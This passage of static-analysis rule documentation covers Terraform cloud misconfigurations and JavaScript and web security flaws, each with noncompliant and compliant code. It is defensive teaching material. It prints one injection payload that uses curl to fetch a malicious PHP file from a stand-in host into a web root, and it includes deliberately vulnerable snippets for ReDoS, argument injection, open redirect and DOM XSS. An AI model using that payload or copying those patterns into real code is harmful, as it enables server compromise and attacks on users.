resource "aws_api_gateway_method" "compliantapi" {
  authorization = "AWS_IAM"
  http_method   = "GET"
}

See

terraform:S6413

Defining a short log retention duration can reduce an organization’s ability to backtrace the actions of malicious actors in case of a security incident.

Logging allows operational and security teams to get detailed and real-time feedback on an information system’s events. The logging coverage enables them to quickly react to events, ranging from the most benign bugs to the most impactful security incidents, such as intrusions.

Apart from security detection, logging capabilities also directly influence future digital forensic analyses. For example, detailed logging will allow investigators to establish a timeline of the actions perpetrated by an attacker.

Ask Yourself Whether

  • This component is essential for the information system infrastructure.
  • This component is essential for mission-critical functions.
  • Compliance policies require traceability for a longer duration.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Setting the log retention period to 14 days is the bare minimum. It’s recommended to increase it to 30 days or more.
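
For log groups that already exist, the same retention can be applied with the AWS CLI (the log group name is a placeholder):

```shell
# Set a 30-day retention policy on an existing CloudWatch log group.
aws logs put-retention-policy \
    --log-group-name "example" \
    --retention-in-days 30
```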

Sensitive Code Example

For AWS Cloudwatch Logs:

resource "aws_cloudwatch_log_group" "example" {
  name = "example"
  retention_in_days = 3 # Sensitive
}

For Azure Firewall Policy:

resource "azurerm_firewall_policy" "example" {
  insights {
    enabled = true
    retention_in_days = 7 # Sensitive
  }
}

For Google Cloud Logging buckets:

resource "google_logging_project_bucket_config" "example" {
    project = var.project
    location = "global"
    retention_days = 7 # Sensitive
    bucket_id = "_Default"
}

Compliant Solution

For AWS Cloudwatch Logs:

resource "aws_cloudwatch_log_group" "example" {
  name = "example"
  retention_in_days = 30
}

For Azure Firewall Policy:

resource "azurerm_firewall_policy" "example" {
  insights {
    enabled = true
    retention_in_days = 30
  }
}

For Google Cloud Logging buckets:

resource "google_logging_project_bucket_config" "example" {
    project = var.project
    location = "global"
    retention_days = 30
    bucket_id = "_Default"
}
terraform:S6412

When object versioning for Google Cloud Storage (GCS) buckets is enabled, different versions of an object are stored in the bucket, preventing accidental deletion. A specific version can always be deleted when the generation number of an object version is specified in the request.

Object versioning cannot be enabled on a bucket with a retention policy. A retention policy ensures that an object is retained for a specific period of time even if a request is made to delete or replace it. Thus, a retention policy locks the single current version of an object in the bucket, which differs from object versioning where different versions of an object are retained.

Ask Yourself Whether

  • The bucket stores information that requires high availability.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

It’s recommended to enable GCS bucket versioning so that different versions of an object can be retrieved and restored.
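
Assuming the gsutil CLI is available, versioning can also be turned on for an existing bucket (the bucket name is a placeholder):

```shell
# Enable object versioning on an existing GCS bucket.
gsutil versioning set on gs://example
```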

Sensitive Code Example

Versioning is disabled by default:

resource "google_storage_bucket" "example" { # Sensitive
  name          = "example"
  location      = "US"
}

Compliant Solution

Versioning is enabled:

resource "google_storage_bucket" "example" {
  name          = "example"
  location      = "US"

  versioning {
    enabled = true
  }
}

See

terraform:S6379

Enabling Azure resource-specific admin accounts can reduce an organization’s ability to protect itself against account or service account thefts.

Full Administrator permissions fail to correctly separate duties and create potentially critical attack vectors on the impacted resources.

In case of abuse of elevated permissions, both the data on which impacted resources operate and their access traceability are at risk.

Ask Yourself Whether

  • This Azure resource is essential for the information system infrastructure.
  • This Azure resource is essential for mission-critical functions.
  • Compliance policies require this resource to disable its administrative accounts or permissions.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Disable the administrative accounts or permissions in this Azure resource.

Sensitive Code Example

For Azure Batch Pools:

resource "azurerm_batch_pool" "example" {
  name = "sensitive"

  start_task {
    user_identity {
      auto_user {
        elevation_level = "Admin" # Sensitive
        scope = "Task"
      }
    }
  }
}

For Azure Container Registries:

resource "azurerm_container_registry" "example" {
  name = "example"
  admin_enabled = true # Sensitive
}

Compliant Solution

For Azure Batch Pools:

resource "azurerm_batch_pool" "example" {
  name = "example"

  start_task {
    user_identity {
      auto_user {
        elevation_level = "NonAdmin"
        scope = "Task"
      }
    }
  }
}

For Azure Container Registries:

resource "azurerm_container_registry" "example" {
  name = "example"
  admin_enabled = false
}

See

terraform:S6258

Disabling logging of this component can lead to missing traceability in case of a security incident.

Logging allows operational and security teams to get detailed and real-time feedback on an information system’s events. The logging coverage enables them to quickly react to events, ranging from the most benign bugs to the most impactful security incidents, such as intrusions.

Apart from security detection, logging capabilities also directly influence future digital forensic analyses. For example, detailed logging will allow investigators to establish a timeline of the actions perpetrated by an attacker.

Ask Yourself Whether

  • This component is essential for the information system infrastructure.
  • This component is essential for mission-critical functions.
  • Compliance policies require this component to be monitored.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Enable the logging capabilities of this component. Depending on the component, new permissions might be required by the logging storage components.
You should consult the official documentation to enable logging for the impacted components. For example, AWS Application Load Balancer Access Logs require an additional bucket policy.

Sensitive Code Example

For Amazon S3 access requests:

resource "aws_s3_bucket" "example" { # Sensitive
  bucket = "example"
}

For Amazon API Gateway stages:

resource "aws_api_gateway_stage" "example" { # Sensitive
  xray_tracing_enabled = false # Sensitive
}

For Amazon MSK Broker logs:

resource "aws_msk_cluster" "example" {
  cluster_name           = "example"
  kafka_version          = "2.7.1"
  number_of_broker_nodes = 3

  logging_info {
    broker_logs { # Sensitive
      firehose {
        enabled = false
      }
      s3 {
        enabled = false
      }
    }
  }
}

For Amazon MQ Brokers:

resource "aws_mq_broker" "example" {
  logs {  # Sensitive
    audit   = false
    general = false
  }
}

For Amazon DocumentDB:

resource "aws_docdb_cluster" "example" { # Sensitive
  cluster_identifier = "example"
}

For Azure App Services:

resource "azurerm_app_service" "example" {
  logs {
    application_logs {
      file_system_level = "Off" # Sensitive
      azure_blob_storage {
        level = "Off"           # Sensitive
      }
    }
  }
}

For GCP VPC Subnetwork:

resource "google_compute_subnetwork" "example" { # Sensitive
  name          = "example"
  ip_cidr_range = "10.2.0.0/16"
  region        = "us-central1"
  network       = google_compute_network.example.id
}

For GCP SQL Database Instance:

resource "google_sql_database_instance" "example" {
  name = "example"

  settings { # Sensitive
    tier = "db-f1-micro"
    ip_configuration {
      require_ssl  = true
      ipv4_enabled = true
    }
  }
}

For GCP Kubernetes Engine (GKE) cluster:

resource "google_container_cluster" "example" {
  name               = "example"
  logging_service    = "none" # Sensitive
}

Compliant Solution

For Amazon S3 access requests:

resource "aws_s3_bucket" "example-logs" {
  bucket = "example_logstorage"
  acl    = "log-delivery-write"
}

resource "aws_s3_bucket" "example" {
  bucket = "example"

  logging { # AWS provider <= 3
      target_bucket = aws_s3_bucket.example-logs.id
      target_prefix = "log/example"
  }
}

resource "aws_s3_bucket_logging" "example" { # AWS provider >= 4
  bucket = aws_s3_bucket.example.id

  target_bucket = aws_s3_bucket.example-logs.id
  target_prefix = "log/example"
}

For Amazon API Gateway stages:

resource "aws_api_gateway_stage" "example" {
  xray_tracing_enabled = true

  access_log_settings {
    destination_arn = "arn:aws:logs:eu-west-1:123456789:example"
    format = "..."
  }
}

For Amazon MSK Broker logs:

resource "aws_msk_cluster" "example" {
  cluster_name           = "example"
  kafka_version          = "2.7.1"
  number_of_broker_nodes = 3

  logging_info {
    broker_logs {
      firehose   {
        enabled = false
      }
      s3 {
        enabled = true
        bucket  = "example"
        prefix  = "log/msk-"
      }
    }
  }
}

For Amazon MQ Brokers, enable audit or general:

resource "aws_mq_broker" "example" {
  logs {
    audit   = true
    general = true
  }
}

For Amazon DocumentDB:

resource "aws_docdb_cluster" "example" {
  cluster_identifier              = "example"
  enabled_cloudwatch_logs_exports = ["audit"]
}

For Azure App Services:

resource "azurerm_app_service" "example" {
  logs {
    http_logs {
      file_system {
        retention_in_days = 90
        retention_in_mb   = 100
      }
    }

    application_logs {
      file_system_level = "Error"
      azure_blob_storage {
        retention_in_days = 90
        level             = "Error"
      }
    }
  }
}

For GCP VPC Subnetwork:

resource "google_compute_subnetwork" "example" {
  name          = "example"
  ip_cidr_range = "10.2.0.0/16"
  region        = "us-central1"
  network       = google_compute_network.example.id

  log_config {
    aggregation_interval = "INTERVAL_10_MIN"
    flow_sampling        = 0.5
    metadata             = "INCLUDE_ALL_METADATA"
  }
}

For GCP SQL Database Instance:

resource "google_sql_database_instance" "example" {
  name             = "example"

  settings {
    ip_configuration {
      require_ssl  = true
      ipv4_enabled = true
    }
    database_flags {
      name  = "log_connections"
      value = "on"
    }
    database_flags {
      name  = "log_disconnections"
      value = "on"
    }
    database_flags {
      name  = "log_checkpoints"
      value = "on"
    }
    database_flags {
      name  = "log_lock_waits"
      value = "on"
    }
  }
}

For GCP Kubernetes Engine (GKE) cluster:

resource "google_container_cluster" "example" {
  name               = "example"
  logging_service    = "logging.googleapis.com/kubernetes"
}

See

terraform:S6330

Amazon Simple Queue Service (SQS) is a managed message queuing service for application-to-application (A2A) communication. Amazon SQS can store messages encrypted as soon as they are received. In the case that adversaries gain physical access to the storage medium or otherwise leak a message from the file system, for example through a vulnerability in the service, they are not able to access the data.

Ask Yourself Whether

  • The queue contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt SQS queues that contain sensitive information. Encryption and decryption are handled transparently by SQS, so no further modifications to the application are necessary.

Sensitive Code Example

For aws_sqs_queue:

resource "aws_sqs_queue" "queue" {  # Sensitive, encryption disabled by default
  name = "sqs-unencrypted"
}

Compliant Solution

For aws_sqs_queue:

resource "aws_sqs_queue" "queue" {
  name = "sqs-encrypted"
  kms_master_key_id = aws_kms_key.enc_key.key_id
}

See

terraform:S6252

S3 buckets can be in three states related to versioning:

  • unversioned (default one)
  • enabled
  • suspended

When an S3 bucket is unversioned or has versioning suspended, a new version of an object overwrites the existing one in the bucket.

This can lead to unintentional or intentional information loss.

Ask Yourself Whether

  • The bucket stores information that requires high availability.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

It’s recommended to enable S3 versioning so that different versions of an object can be retrieved and restored.

Sensitive Code Example

Versioning is disabled by default:

resource "aws_s3_bucket" "example" { # Sensitive
  bucket = "example"
}

Compliant Solution

Versioning is enabled for AWS provider version 4 or above:

resource "aws_s3_bucket" "example" {
  bucket = "example"
}

resource "aws_s3_bucket_versioning" "example-versioning" {
  bucket = aws_s3_bucket.example.id
  versioning_configuration {
    status = "Enabled"
  }
}

Versioning is enabled for AWS provider version 3 or below:

resource "aws_s3_bucket" "example" {
  bucket = "example"

  versioning {
    enabled = true
  }
}

See

terraform:S6255

When S3 bucket versioning is enabled, it is possible to require an additional authentication factor before versions of an object can be deleted or the versioning state of the bucket can be changed. This prevents accidental object deletion by forcing the user sending the delete request to prove that they have a valid MFA device and a corresponding valid token.

Ask Yourself Whether

  • The S3 bucket stores sensitive information that must be preserved in the long term.
  • The S3 bucket grants delete permission to many users.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to enable S3 MFA delete, note that:

  • MFA delete can only be enabled with the AWS CLI or API and with the root account.
  • To delete an object version, the API should be used with the x-amz-mfa header.
  • The API request, with the x-amz-mfa header, can only be used over HTTPS.
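
The constraints above can be illustrated with the AWS CLI; as a sketch, the root account would run something like the following (the bucket name, MFA device ARN, and token are placeholders):

```shell
# Enable versioning together with MFA delete on a bucket.
# Must be run by the root account; the MFA device ARN and
# 6-digit token below are placeholders.
aws s3api put-bucket-versioning \
    --bucket example \
    --versioning-configuration Status=Enabled,MFADelete=Enabled \
    --mfa "arn:aws:iam::123456789012:mfa/root-account-mfa-device 123456"
```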

Sensitive Code Example

A versioned S3 bucket does not have MFA delete enabled for AWS provider version 3 or below:

resource "aws_s3_bucket" "example" { # Sensitive
  bucket = "example"

  versioning {
    enabled = true
  }
}

A versioned S3 bucket does not have MFA delete enabled for AWS provider version 4 or above:

resource "aws_s3_bucket" "example" {
  bucket = "example"
}

resource "aws_s3_bucket_versioning" "example" { # Sensitive
  bucket = aws_s3_bucket.example.id
  versioning_configuration {
    status = "Enabled"
  }
}

Compliant Solution

MFA delete is enabled for AWS provider version 3 or below:

resource "aws_s3_bucket" "example" {
  bucket = "example"

  versioning {
    enabled = true
    mfa_delete = true
  }
}

MFA delete is enabled for AWS provider version 4 or above:

resource "aws_s3_bucket" "example" {
  bucket = "example"
}

resource "aws_s3_bucket_versioning" "example" {
  bucket = aws_s3_bucket.example.id
  versioning_configuration {
    status = "Enabled"
    mfa_delete = "Enabled"
  }
  mfa = var.MFA
}

See

terraform:S6332

Amazon Elastic File System (EFS) is a serverless file system that does not require provisioning or managing storage. Stored files can be automatically encrypted by the service. In the case that adversaries gain physical access to the storage medium or otherwise leak files, for example through a vulnerability in the service, they are not able to access the data.

Ask Yourself Whether

  • The file system contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt EFS file systems that contain sensitive information. Encryption and decryption are handled transparently by EFS, so no further modifications to the application are necessary.

Sensitive Code Example

For aws_efs_file_system:

resource "aws_efs_file_system" "fs" {  # Sensitive, encryption disabled by default
}

Compliant Solution

For aws_efs_file_system:

resource "aws_efs_file_system" "fs" {
  encrypted = true
}

See

terraform:S6375

Azure Active Directory offers built-in roles that can be assigned to users, groups, or service principals. Some of these roles should be carefully assigned as they grant sensitive permissions like the ability to reset passwords for all users.

An Azure account that fails to limit the use of such roles has a higher risk of being breached by a compromised owner.

This rule raises an issue when one of the following roles is assigned:

  • Application Administrator
  • Authentication Administrator
  • Cloud Application Administrator
  • Global Administrator
  • Groups Administrator
  • Helpdesk Administrator
  • Password Administrator
  • Privileged Authentication Administrator
  • Privileged Role Administrator
  • User Administrator

Ask Yourself Whether

  • The user, group, or service principal doesn’t use the entirety of this extensive set of permissions to operate on a day-to-day basis.
  • It is possible to follow the Separation of Duties principle and split permissions between multiple users, but it’s not enforced.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

  • Limit the assignment of Global Administrator roles to less than five people or service principals.
  • Apply the least privilege principle by choosing a role with a limited set of permissions.
  • If no built-in role meets your needs, create a custom role with as few permissions as possible.

Sensitive Code Example

resource "azuread_directory_role" "example" {
  display_name = "Privileged Role Administrator" # Sensitive
}

resource "azuread_directory_role_member" "example" {
  role_object_id   = azuread_directory_role.example.object_id
  member_object_id = data.azuread_user.example.object_id
}

Compliant Solution

resource "azuread_directory_role" "example" {
  display_name = "Usage Summary Reports Reader"
}

resource "azuread_directory_role_member" "example" {
  role_object_id   = azuread_directory_role.example.object_id
  member_object_id = data.azuread_user.example.object_id
}

See

Web:AvoidHtmlCommentCheck

Using HTML-style comments in a page that will be generated or interpolated server-side before being served to the user increases the risk of exposing data that should be kept private. For instance, a developer comment or line of debugging information left in a page could easily (and has in the past) inadvertently expose:

  • Version numbers and host names
  • Full, server-side path names
  • Sensitive user data

Every other language has its own native comment format, so there is no justification for using HTML-style comments in anything other than a pure HTML or XML file.

Ask Yourself Whether

  • The comment contains sensitive information.
  • The comment can be removed.

Recommended Secure Coding Practices

It is recommended to remove the comment or change its style so that it is not output to the client.

Sensitive Code Example

  <%
      out.write("<!-- ${username} -->");  // Sensitive
  %>
      <!-- <% out.write(userId) %> -->  // Sensitive
      <!-- #{userPhone} -->  // Sensitive
      <!-- ${userAddress} --> // Sensitive

      <!-- Replace 'world' with name --> // Sensitive
      <h2>Hello world!</h2>

Compliant Solution

      <%-- Replace 'world' with name --%>  // Compliant
      <h2>Hello world!</h2>

See

Web:S5148

A newly opened window having access back to the originating window could allow basic phishing attacks (the window.opener object is not null and thus window.opener.location can be set to a malicious website by the opened page).

For instance, an attacker can put a link (say: "http://example.com/mylink") on a popular website that changes, when opened, the original page to "http://example.com/fake_login". On "http://example.com/fake_login" there is a fake login page which could trick real users to enter their credentials.

Ask Yourself Whether

  • The application opens untrusted external URLs.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

Use noopener to prevent untrusted pages from abusing window.opener.

Note: In Chrome 88+, Firefox 79+, and Safari 12.1+, target=_blank on anchors implies rel=noopener, which makes this protection enabled by default.

Sensitive Code Example

<a href="http://example.com/dangerous" target="_blank"> <!-- Sensitive -->

<a href="{{variable}}" target="_blank"> <!-- Sensitive -->

Compliant Solution

To prevent pages from abusing window.opener, use rel=noopener on <a href=> to force its value to be null on the opened pages.

<a href="http://petssocialnetwork.io" target="_blank" rel="noopener"> <!-- Compliant -->

Exceptions

No issue will be raised when href contains a hardcoded relative URL, as it then has fewer chances of being vulnerable. A URL is considered hardcoded and relative if it does not start with http:// or https:// and does not contain any of the characters {}$()[]

<a href="internal.html" target="_blank" > <!-- Compliant -->

See

Web:S5725

Using remote artifacts without integrity checks can lead to the unexpected execution of malicious code in the application.

On the client side, where front-end code is executed, malicious code could:

  • impersonate users' identities and take advantage of their privileges on the application.
  • add quiet malware that monitors users' sessions and captures sensitive secrets.
  • gain access to sensitive clients' personal data.
  • deface, or otherwise affect the general availability of the application.
  • mine cryptocurrencies in the background.

Likewise, a compromised software piece that would be deployed on a server-side application could badly affect the application’s security. For example, server-side malware could:

  • access and modify sensitive technical and business data.
  • elevate its privileges on the underlying operating system.
  • use the compromised application as a pivot to attack the local network.

By ensuring that a remote artifact is exactly what it is supposed to be before using it, the application is protected from unexpected changes applied to it before it is downloaded.
In particular, integrity checks make it possible to identify an artifact that was replaced by malware on the publication website or, in a more benign scenario, that was legitimately changed by its author.

Important note: downloading an artifact over HTTPS only protects it while in transit from one host to another. It provides authenticity and integrity checks for the network stream only. It does not ensure the authenticity or security of the artifact itself.

Ask Yourself Whether

  • The artifact is a file intended to execute code.
  • The artifact is a file that is intended to configure or affect running code in some way.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

To check the integrity of a remote artifact, hash verification is the most reliable solution. It ensures that the file has not been modified since the fingerprint was computed.

In this case, the artifact’s hash must:

  • Be computed with a secure hash algorithm such as SHA512, SHA384 or SHA256.
  • Be compared with a secure hash that was not downloaded from the same source.

To do so, the best option is to add the hash in the code explicitly, by following Mozilla’s official documentation on how to generate integrity strings.

Note: Use this fix together with version binding on the remote file. Avoid downloading files named "latest" or similar, so that the front-end pages do not break when the code of the latest remote artifact changes.
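
Assuming OpenSSL is installed, an integrity string can be generated from a local copy of the artifact; the sample file created below stands in for the downloaded script:

```shell
# Create a stand-in for the downloaded artifact so the commands run standalone.
printf 'console.log("hello");\n' > script.js

# SHA-384 digest, base64-encoded, in the format expected by the
# integrity attribute: sha384-<base64 digest>.
integrity="sha384-$(openssl dgst -sha384 -binary script.js | openssl base64 -A)"
echo "$integrity"
```

The resulting value is pasted into the integrity attribute of the script tag.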

Sensitive Code Example

The following code sample uses neither integrity checks nor version pinning:

<script
    src="https://cdn.example.com/latest/script.js"
></script> <!-- Sensitive -->

Compliant Solution

<script
    src="https://cdn.example.com/v5.3.6/script.js"
    integrity="sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/uxy9rx7HNQlGYl1kPzQho1wx4JwY8wC"
></script>

See

jssecurity:S2631

Why is this an issue?

Regular expression injections occur when the application retrieves untrusted data and uses it as a regex to pattern match a string with it.

Most regular expression search engines use backtracking to try all possible regex execution paths when evaluating an input. Sometimes this can lead to performance problems also referred to as catastrophic backtracking situations.

What is the potential impact?

In the context of a web application vulnerable to regex injection:
After discovering the injection point, attackers insert data into the vulnerable field to make the affected component inaccessible.

Depending on the application’s software architecture and the injection point’s location, the impact may or may not be visible.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Self Denial of Service

In cases where the complexity of the regular expression is exponential to the input size, a small, carefully-crafted input (for example, 20 chars) can trigger catastrophic backtracking and cause a denial of service of the application.

Super-linear regex complexity can produce the same effects for a large, carefully crafted input (thousands of chars).

If the component jeopardized by this vulnerability is not a bottleneck that acts as a single point of failure (SPOF) within the application, the denial of service might only affect the attacker who initiated it.

Such benign denial of service can also occur in architectures that rely heavily on containers and container orchestrators. Replication systems would detect the failure of a container and automatically replace it.

Infrastructure SPOFs

However, a denial of service attack can be critical to the enterprise if it targets a SPOF component. Sometimes the SPOF is a software architecture vulnerability (such as a single component on which multiple critical components depend) or an operational vulnerability (for example, insufficient container creation capabilities or failures from containers to terminate).

In either case, attackers aim to exploit the infrastructure weakness by sending as many malicious payloads as possible, using potentially huge offensive infrastructures.

These threats are particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

How to fix it in Node.js

Code examples

The following noncompliant code is vulnerable to Regex Denial of Service (ReDoS) because untrusted data is used as a regex to scan a string without prior sanitization or validation.

Noncompliant code example

const express = require('express');

const app = express();

app.get('/lookup', (req, res) => {
  const regex = RegExp(req.query.regex); // Noncompliant

  if(regex.test(req.query.data)){
    res.send("It's a Match!");
  }else{
    res.send("Not a Match!");
  }
})

Compliant solution

const express = require('express');
const escapeStringRegexp = require('escape-string-regexp');

const app = express();

app.get('/lookup', (req, res) => {
  const regex = RegExp(escapeStringRegexp(req.query.regex));

  if(regex.test(req.query.data)){
    res.send("It's a Match!");
  }else{
    res.send("Not a Match!");
  }
})

How does this work?

Sanitization and Validation

Escaping metacharacters with native functions is one solution against regex injection.
The escape function sanitizes the input so that the regular expression engine interprets these characters literally.

An allowlist approach can also be used by creating a list containing authorized and secure strings you want the application to use in a query.
If a user input does not match an entry in this list, it should be considered unsafe and rejected.

Important note: The application must sanitize and validate user input on the server side, not on the client-side front end.

Where possible, use non-backtracking regex engines, for example, Google’s re2.

In the compliant solution, the escapeStringRegexp function provided by the npm package escape-string-regexp escapes metacharacters and escape sequences that could have broken the initially intended logic.

Resources

Articles & blog posts

Standards

jssecurity:S5883

Why is this an issue?

OS command argument injections occur when applications allow the execution of operating system commands from untrusted data, but the untrusted data is limited to the arguments.
It is not possible to directly inject arbitrary commands that compromise the underlying operating system, but the behavior of the executed command can still be influenced in a way that expands access, for example, to the execution of arbitrary commands. The security of the application depends on the behavior of the command that is executed.

What is the potential impact?

An attacker exploiting an argument injection vulnerability will be able to add arbitrary arguments to a system binary call. Depending on the command the arguments are added to, this might lead to arbitrary command execution.

The impact depends on the access control measures taken on the target system OS. In the worst-case scenario, the process runs with root privileges, and therefore any OS commands or programs may be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Denial of service and data leaks

In this scenario, the attack aims to disrupt the organization’s activities and profit from data leaks.

An attacker could, for example:

  • download the internal server’s data, most likely to sell it
  • modify data, send malware
  • stop services or exhaust resources (with fork bombs for example)

This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

Root privilege escalation and pivot

In this scenario, the attacker can do everything described in the previous section. The difference is that the attacker also manages to elevate their privileges to an administrative level and attacks other servers.

Here, the impact depends on how much the target company focuses on its Defense In Depth. For example, the entire infrastructure can be compromised by a combination of OS injections and misconfiguration of:

  • Docker or Kubernetes clusters
  • cloud services
  • network firewalls and routing
  • OS access control

How to fix it in Express.js

Code examples

The following code uses the find command and expects the user to enter the name of a file to find on the system.

It is vulnerable to argument injection because untrusted data is inserted in the arguments of a process call without prior validation or sanitization.
Here, the application ignores that a user-submitted parameter might contain special characters that will tamper with the expected system command behavior.

In this particular case, an attacker might add arbitrary arguments to the find command for malicious purposes. For example, the following payload will download malicious software onto the application’s hosting server.

 -exec curl -o /var/www/html/ http://evil.example.org/malicious.php ;

Noncompliant code example

const execa = require('execa');

async function (req, res) {
    await execa.command('find /tmp/images/' + req.query.id); // Noncompliant
}

Compliant solution

const execa = require('execa');

async function (req, res) {
    if (req.query.file && req.query.file.match(/^[A-Z]+$/i)) {
        await execa('find', ['/tmp/images/' + req.query.file]);
    } else {
        await execa('find', ['/tmp/images/']);
    }
}

How does this work?

Allowing users to insert data in operating system commands generally creates more problems than it solves.

Anything that can be done via operating system commands can usually be done via a language’s native SDK.
Therefore, our suggestion is to avoid using OS commands in the first place.

When this is not possible, strict measures should be applied to ensure a secure implementation.

The proposed compliant solution makes use of the execa method, which separates the command to run from the arguments passed to it. It also ensures that all arguments passed to the executed command are properly escaped. That way, an attacker with control over a command parameter cannot inject arbitrary new ones.

While this reduces the chances for an attacker to identify an exploitation payload, the highest security level will only be reached by adding an additional validation layer.

In the current example, an attacker with control over the first parameter of the find command could still inject special file path characters into it. Indeed, passing the string ../../ as a parameter would force the find command to crawl the whole file system. This could lead to a denial of service or sensitive data exposure.

Here, adding a regular-expression-based validation on the user-controlled value prevents this kind of issue. It ensures that the user-submitted parameter contains a harmless value.

Resources

Documentation

Standards

jssecurity:S5146

Why is this an issue?

Open redirection occurs when an application uses user-controllable data to redirect users to a URL.

An attacker with malicious intent could manipulate a user into browsing to a specially crafted URL, such as https://trusted.example.com?url=evil.example.com, to redirect the victim to their evil domain.

Tricking users into sending the malicious HTTP request is usually the main task when exploiting an open redirection. Often, it requires the attacker to build a credible pretext so as not to arouse the victim’s suspicion.

Attackers commonly use open redirect exploits in mass phishing campaigns.

What is the potential impact?

If an attacker tricks a user into opening a link of the attacker’s choice, the user is redirected to a domain controlled by the attacker.

From then on, the attacker can perform various malicious actions, some more impactful than others.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Domain Mirroring

A malicious link redirects to an attacker-controlled website mirroring the interface of a web application trusted by the user. Due to the similarity in the application’s appearance and the seemingly trustworthy hyperlink, the user struggles to identify that they are browsing on a malicious domain.

Depending on the attacker’s purpose, the malicious website can leak credentials, bypass Multi-Factor Authentication (MFA), and reach any authenticated data or action.

Malware Distribution

A malicious link redirects to an attacker’s controlled website that serves malware. On the same basis as the domain mirroring exploitation, the attacker develops a spearphishing or phishing campaign with a carefully crafted pretext that would result in the download and potential execution of a hosted malicious file.
The worst-case scenario could result in complete system compromise.

How to fix it in Express.js

Code examples

The following noncompliant code example is vulnerable to open redirection as it constructs a URL with user-controllable data. This URL is then used to redirect the user without being first validated. An attacker can leverage this to manipulate users into performing unwanted redirects.

Noncompliant code example

server.get('/redirect', (request, response) => {

   response.redirect(request.query.url); // Noncompliant
});

Compliant solution

server.get('/redirect', (request, response) => {

   if (request.query.url.startsWith("https://www.example.com/")) {
      response.redirect(request.query.url);
   }
});

How does this work?

Built-in framework methods should be preferred as, more often than not, they provide additional security mechanisms. However, these built-in methods are usually engineered for internal page redirections, so they might not fit the reader’s use case.

In case the application strictly requires external redirections based on user-controllable data, this could be done using the following alternatives:

  1. Validating the authority part of the URL against a statically defined value (see Pitfalls).
  2. Using an allow-list approach in case the destination URLs are multiple but limited.
  3. Adding a customized page to which users are redirected, warning about the imminent action and requiring manual authorization to proceed.
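
A sketch of the allow-list approach (item 2), assuming an Express-style handler; the handleRedirect name and the destination identifiers are illustrative:

```javascript
// Users submit a known identifier, never a raw URL. A Map avoids
// accidental prototype-chain lookups such as "toString".
const allowedRedirects = new Map([
  ["home", "https://www.example.com/"],
  ["docs", "https://docs.example.com/"],
]);

function handleRedirect(request, response) {
  const target = allowedRedirects.get(request.query.to);
  if (target !== undefined) {
    response.redirect(target);
  } else {
    response.status(400).send("Unknown redirect target");
  }
}
```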

Pitfalls

The trap of 'StartsWith' and equivalents

When validating untrusted URLs by checking if they start with a trusted scheme and authority pair scheme://authority, ensure that the validation string contains a path separator / as the last character.

If the validation string does not contain a terminating path separator, the Open Redirect vulnerability remains; only the exploitation technique changes.

Thus, a validation like startsWith("https://example.com") or an equivalent with the regex ^https://example\.com.* can be exploited with a URL such as https://example.com.malicious.io. The practice of registering domains that maliciously resemble existing ones is widespread and is called cybersquatting.
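
A sketch of a prefix check that avoids this trap; the trailing / in the validation string is what closes the bypass:

```javascript
// The trailing "/" ensures that "https://example.com.malicious.io"
// fails the check while "https://example.com/path" passes it.
function hasTrustedPrefix(url) {
  return typeof url === "string" && url.startsWith("https://example.com/");
}
```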

Resources

Standards

jssecurity:S5696

Why is this an issue?

DOM-based cross-site scripting (XSS) occurs in a web application when its client-side logic reads user-controllable data, such as the URL, and then uses this data in dangerous functions defined by the browser, such as eval(), without sanitizing it first.

When well-intentioned users open a link to a page vulnerable to DOM-based XSS, they are exposed to several attacks targeting their browsers.

What is the potential impact?

A well-intentioned user opens a malicious link that injects data into the web application. This data can be text, but also arbitrary code that can be interpreted by the user’s browser, such as HTML, CSS, or JavaScript.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting this vulnerability.

Website defacement

An attacker can use the vulnerability to change the target web application’s content as they see fit. Therefore, they might replace the website’s original content with inappropriate content, leading to brand and reputation damage for the web application owner. It could additionally be used in phishing campaigns, leading to the potential loss of user credentials.

User impersonation

When a user is logged into a web application and opens a malicious link, the attacker can steal that user’s web session and carry out unauthorized actions on their account. If the credentials of a privileged user (such as an administrator) are stolen, the attacker might be able to compromise all of the web application’s data.

Theft of sensitive data

Cross-site scripting allows an attacker to extract the application data of any user that opens their malicious link. Depending on the application, this can include sensitive data such as financial or health information. Furthermore, by injecting malicious code into the web application, it might be possible to record keyboard activity (keylogger) or even request access to other devices, such as the camera or microphone.

Chaining XSS with other vulnerabilities

In many cases, bug hunters and attackers can use cross-site scripting vulnerabilities as a first step to exploit more dangerous vulnerabilities.

For example, suppose that the admin control panel of a web application contains an SQL injection vulnerability. In this case, an attacker could find an XSS vulnerability and send a malicious link to an administrator. Once the administrator opens the link, the SQL injection is exploited, giving the attacker access to all user data stored in the web application.

How to fix it in DOM API

Code examples

The following code is vulnerable to DOM-based cross-site scripting because it uses unsanitized URL parameters to alter the DOM of its webpage.

Because the user input is not sanitized here and the used DOM property is vulnerable to XSS, it is possible to inject arbitrary code in the user’s browser through this example.

Noncompliant code example

The Element.innerHTML property is used to replace the contents of the root element with user-supplied contents. The innerHTML property does not sanitize its input, thus allowing for code injection.

const rootEl = document.getElementById('root');
const queryParams = new URLSearchParams(document.location.search);
const input = queryParams.get("input");

rootEl.innerHTML = input; // Noncompliant

Compliant solution

The HTMLElement.innerText property does not create DOM elements out of its input; instead, it treats its input as a string. This makes it a safe alternative to Element.innerHTML, depending on the use case.

const rootEl = document.getElementById('root');
